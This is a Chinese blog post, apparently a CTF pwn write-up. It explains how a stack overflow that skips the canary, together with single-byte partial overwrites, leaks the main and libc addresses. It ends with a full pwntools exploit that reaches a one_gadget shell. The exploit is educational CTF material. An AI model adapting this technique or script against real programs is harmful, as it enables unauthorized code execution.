解题记录(2)

于 2021-11-11 15:40:17 发布
阅读量266 收藏
点赞数
分类专栏: pwn 文章标签: pwn libc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/F_Day_/article/details/121267828
版权

解题记录(2)

题目不难,但也有思考的地方

题目

如下,保护全开
在这里插入图片描述main函数是调用game函数的,所以主要看一下game函数

主要有下面两点
首先是这一部分,可控的v4,并对数组v5进行写操作,因此这里存在栈溢出,并且能够绕过Canary
在这里插入图片描述第二部分如下,打印刚才写入的单元,但只打印6个字节
在这里插入图片描述

分析

函数可利用的就上面介绍的两点,其他的都是打印打印

先看看第一个read的使用,一开始想到的是栈溢出,因为能够绕过canary直接修改函数返回值,但马上想到,由于程序保护全开,地址进行了随机化,所以就没办法确定函数地址了

之后想到了write函数,能够打印出这个地址的内容,因此,我又想到的是,game函数的返回值其实就是main函数中call game下一条指令的地址
在这里插入图片描述
并且由于程序是从0x0开始的,main函数的地址从0xf1a开始,如果我用0x1a覆盖该返回地址的一个字节,并输出,那么就能得到main的地址了,如下
在这里插入图片描述
有了main的地址,那么是不是就能够正常的溢出了?
我到这里才意识到一个问题,如果我要栈溢出,那么我需要向栈里写入我想要的数据,但read这个漏洞如果不去修改返回地址的话,那他只能用一次,所以这条路走不通

之后有意识到,调用main函数的是__libc_start_main函数,而main函数的返回地址在game返回地址的后两个,也就是v5[25]处
那么可以用同样的方式泄露出__libc_start_main的地址
在这里插入图片描述同样,需要先修改v[25],我这里只覆盖了一个字节,然后打印出的是__libc_start_main+202的地址,通过它能够计算libc的地址了,然后通过one_gadget就能找到执行execve("/bin/sh")的地址
因此,只要在执行一次game函数,同时将game或者main函数的返回地址修改为执行获取shell的地址,就能拿到shell了
那么现在的问题是如何让程序返回

main的返回地址是__libc_start_main某处,我通过覆盖一个字节泄露出了这个地址
而覆盖的这个字节要小于__libc_start_main调用main时指令地址的最末尾的一个字节,并且不能破坏程序结构,因此这里需要一个一个的去尝试,我运气好,用的之前覆盖game返回值的那个字节就成功了
不能覆盖两个以上字节,因为只能确定最后一个字节偏移是没有变的,至于两个字节就不确定了

那么最后的exp

from pwn import *
#context.log_level='debug'
p = process('./Metaphysical_Necrosis')
elf = ELF('./Metaphysical_Necrosis')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

def debug():
	gdb.attach(p)
	pause()

payload = 2
def send(pos, data):
	p.recvuntil('你要把C4安放在哪里呢?\n')
	p.sendline(str(pos))
	p.send(data)
	p.recvuntil('the bomb has been planted!\n')
	p.sendline()
	p.recvuntil('不如把它宰了,吃一顿大餐,你说吼不吼啊!\n')
	p.sendline()
	p.recvuntil('你决定给它起个名字:')
	p.sendline('Mike')
	p.recvuntil('接下来开始切菜,你打算把它切成几段呢?\n')
	p.sendline('1')
	p.recvuntil('第0段打算怎么料理呢:')
	p.sendline('1')
	p.recvuntil('就在此时,你发现了一根茄子,这根茄子居然已经把锅里的金枪鱼吃了大半。\n')
	p.sendline()
	p.recvuntil('仔细观察一下,你发现这居然是一只E99p1ant,并且有大量邪恶的能量从中散发。\n')
	p.sendline()
	p.recvuntil('你吓得立马扔掉了它,E99p1ant在空中飞行了114514秒,请问它经过的路程是__m:\n')
	p.sendline('1')
	p.recvline()
	base = u64(p.recv(6).ljust(8, b'\x00'))
	#print(hex(base))
	p.recvuntil('…____\n')
	p.sendline()
	p.recvline()
	return base
base = send(5, p8(0x1a))
__libc_start_main = libc.sym['__libc_start_main']
libc_base = base - 202 - __libc_start_main
exe_binsh = 0x45226 + libc_base
base = send(5, p64(exe_binsh))
p.interactive()

最后

从exp也能看出,题目难度不大,但需要能够想到main的返回地址是__libc_start_main的某处,这样就能泄露libc基地址了

F_D。
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Core dump 分析实例一
mzhan017的博客
08-06 602
64位机,从log里得到的backtrace信息:00007f0af65c7079 00007f0af65f20e1;是动态链接库的地址 /usr/lib64/libc-2.17.so: 7f0af657a000-7f0af6943000 通过objdump -D 反编译libc-2.17.so 文件,可以查找到对应的coredump发生的位置。 00007f0af65c7079 - 7f0af657a000 = 4D079 0000000000048600 <_IO_vfprintf>
__libc_start_main 是什么
CHOOOU的博客
08-10 3275
Name __libc_start_main – initialization routine Synopsis int __libc_start_main(int (main) (int, char , char ), int argc, char * ubp_av, void (init) (void), void (*fini) (void), void (*rtld_fini)...
Linux动态库和静态库
热门推荐
2021dragon的博客
10-30 1万+
文章目录动静态库的基本原理认识动静态库动静态库各自的特征静态库的打包与使用打包使用动态库的打包与使用打包使用 动静态库的基本原理 动静态库的本质是可执行程序的“半成品”。 我们都知道,一堆源文件和头文件最终变成一个可执行程序需要经历以下四个步骤: 预处理: 完成头文件展开、去注释、宏替换、条件编译等,最终形成xxx.i文件。 编译: 完成词法分析、语法分析、语义分析、符号汇总等,检查无误后将代码翻译成汇编指令,最终形成xxx.s文件。 汇编: 将汇编指令转换成二进制指令,最终形成xxx.o文件。 链接
Linux segfault错误排查
xiejianjun417的专栏
04-12 7813
Linux下一般情况程序出现段错误异常崩溃时,并不会产生core文件,此时可借助/var/log/messages中打印的错误信息进行排查。如下错误信息: segfault at 7f30beffe000 ip 00007f30c6eebda9 sp 00007f30a7ffc4a0 error 4 in libc-2.17.so[7f30c6e56000+1c3000] 其中,异常在libc-2.17.so库中,00007f30beffe000为出错地址,7f30c6eebda9为指令地址,00007
Linux X86 程序启动 – main函数是如何被执行的?
luomuxiaoxiao98的专栏
12-11 2076
欢迎访问我的个人博客: luomuxiaoxiao.com 一、目标读者 二、覆盖范围 三、调用过程分析 3.1 main函数的调用 main函数如何被调用 3.2 _start函数分析 3.2.1 首先,_start是如何启动的? 3.2.2 _start函数就是我们开始的地方 3.2.3 调用__libc_start_main之前的设置 3.2.4 环境变量哪里去了? 3.3 __l...
RCTF2020_nowrite(libc_start_main的妙用+盲注)
seaaseesa的博客
06-11 1399
RCTF2020_nowrite(libc_start_main的妙用+盲注) 首先,检查一下程序的保护机制 检测一下沙箱,发现仅能进行open、read、exit操作,write操作都不行。 然后,我们用IDA分析一下,是一个及其简短的栈溢出程序 程序中没有输出,并且write也禁用了,也没有open函数,execve也禁用了,FULL RELRO也不能进行ret2dl,那么本题只能进行盲注,我们还需要构造出一个open系统调用。但是几乎没有可用的地方可以给我们构造。 找到一条有用的
解题记录.md
11-08
解题记录.md
记录ctf解题过程及脚本.zip
10-25
记录ctf解题过程及脚本
leetcode:记录解题思路
03-15
记录解题思路对于复习和分享经验非常重要,可以帮助我们回顾解决问题的过程,避免重复犯错,也能帮助他人理解解决方案。 3. **JavaScript**: JavaScript 是一种广泛使用的脚本语言,尤其在网络开发中占据主导地位。...
栈溢出之覆盖函数返回地址
iczfy585的博客
10-18 3232
栈溢出之覆盖函数返回地址原理利用 原理 栈溢出:栈溢出就是栈上的缓冲区填入过多的数据,超出了边界,从而导致了栈上原有数据被覆盖。 函数调用的时候,会开辟一个栈帧结构。首先会将调用的函数的参数入栈,然后依次压入调用函数返回地址和当前栈底指针寄存器(BP)的值入栈。其中压入返回地址是通过call指令来实现的。 在函数调用结束的时候,将栈指针SP重新指向帧指针BP的位置,并弹出BP和返回地址IP。这样函数状态将恢复成进入子函数的状态,实现了函数栈的切换。 当用call指令调用一个函数的时候,首先会将IP寄存
Cisco Packet Tracer NAT模拟实验
夏虫不可语冰
12-17 3227
Cisco Packet Tracer NAT模拟实验 by: 铁乐猫 date: 2020-09-22 cisco packet tracer : 7.2.2 NAT简介 NAT允许将私有IP地址映射到公网(合法的Internet IP) 地址,以此来做到多个内网ip共用一个公网ip之类。 NAT使用场景: 需要连接Internet,但是你的主机没有公网IP地址 更换了一个新的ISP, 需要重新组织网络 需要合并两个具有相同网络地址的内网 NAT一般应用在边界路由器中,比如公司连接Internet的路
pwn 暑假复习三 libc泄露
SsMing的博客
07-15 7382
ctfwiki例一:ret2libc2拿到程序checksec查看:没什么问题源码int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+1Ch] [bp-64h]@1 setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 1, 0); p...
CTF中的PWN——绕NX防护2(泄露libc + 栈溢出)
壊壊的诱惑你的博客
10-23 1692
前言: 继续PWN的学习,今天整理一下绕过NX,同时libc本地不存在需要通过相应函数泄露地址的方式进行进行溢出。 本题工具介绍: LibcSearcher 一个基于libc_database写的python库,可以通过泄露的函数实际地址查找对应的libc版本。 from LibcSearcher import * #第二个参数,为已泄露的实际地址,或最后12...
暑期 pwn! pwn! pang! (二):ret2libc3 libc泄露,无system
qq_43342413的博客
07-10 722
不管这题是不是洪水猛兽,得先看了安全保护才知道: 源程序开启了栈堆不可执行保护,但可以用rop的方法绕过。 那就再看看源程序,发现仍是栈溢出,可以利用write函数溢出。 检查是否有"/bin/sh" 及system,发现并没有!!! ROPgadget --binary pwn001 --string "/bin/sh" gdb pwn001 p system 那么我们该如何得到syst...
泄露libc
inquisiter
01-12 1541
pintf泄露libc 虽然存在格式化字符串漏洞,并且GOT表可写,但是程序使用的是printf_chk函数。会检测出形如&amp;quot;%n&amp;quot;和&amp;quot;%12$p&amp;quot;这种利用方式。 考虑到main函数libc_start_main调用,因此栈上的返回地址是一个libc中的地址,利用格式化字符串漏洞能泄露出libc的基址。 “%p::%p::%p::%p::%p::%p::%p::%p”。第8个%p就能打印出l
VB+ACCESS宾馆客房管理系统(系统+论文+封面).zip
最新发布
08-16
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
自密实混凝土的研究进展.doc
08-16
自密实混凝土的研究进展.doc
基于Andriod条码识别的商品价格查询软件APP设计与实现.docx
08-16
基于Andriod条码识别的商品价格查询软件APP设计与实现.docx
基于python的人脸控制俄罗斯方块小游戏
08-16
基于python的人脸控制俄罗斯方块小游戏
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值